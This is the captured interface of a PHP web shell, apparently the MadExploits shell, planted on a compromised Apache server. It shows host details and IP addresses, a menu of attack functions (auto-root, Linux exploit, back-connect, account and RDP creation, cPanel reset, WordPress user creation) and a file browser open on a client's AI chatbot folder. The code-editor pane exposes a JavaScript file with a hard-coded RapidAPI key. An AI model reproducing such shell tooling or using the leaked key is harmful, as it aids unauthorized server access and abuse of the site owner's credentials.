Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 18.223.195.30
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
AI_Render /
[ HOME SHELL ]
Name
Size
Permission
Action
index.html
1.96
KB
-rw-r--r--
php-data.php
784
B
-rw-r--r--
script.js
1.48
KB
-rw-r--r--
style.css
1.08
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : script.js
var abc = ''; function run(){ var search = document.getElementById('input_field').value; document.getElementById('input_field1').value = ''; //alert(search); const options = { method: 'POST', headers: { 'content-type': 'application/json', 'X-RapidAPI-Key': 'c3e7e0f9a2msh9541025fef72972p19b90ejsn2b4a44807bbe', 'X-RapidAPI-Host': 'chatgpt-ai-chat-bot.p.rapidapi.com' }, body: '{"text":"'+search+'"}' }; fetch('https://chatgpt-ai-chat-bot.p.rapidapi.com/ask', options) .then(response => response.text()) .then(response => boxvalue = document.getElementById('input_field1').value = response ) .catch(err => boxvalue = document.getElementById('input_field1').value = console.error(err)); } // I am using the Following Rapid API. --> https://rapidapi.com/yourdevmail/api/chatgpt-ai-chat-bot // The Following Code can be used to Fetch the data using --> JavaScript Fetch // const options = { // method: 'POST', // headers: { // 'content-type': 'application/json', // 'X-RapidAPI-Key': 'c3e7e0f9a2msh9541025fef72972p19b90ejsn2b4a44807bbe', // 'X-RapidAPI-Host': 'chatgpt-ai-chat-bot.p.rapidapi.com' // }, // body: '{"text":"Plan a Iternary to Manali"}' // }; // fetch('https://chatgpt-ai-chat-bot.p.rapidapi.com/ask', options) // .then(response => response.json()) // .then(response => console.log(response)) // .catch(err => console.error(err));
Close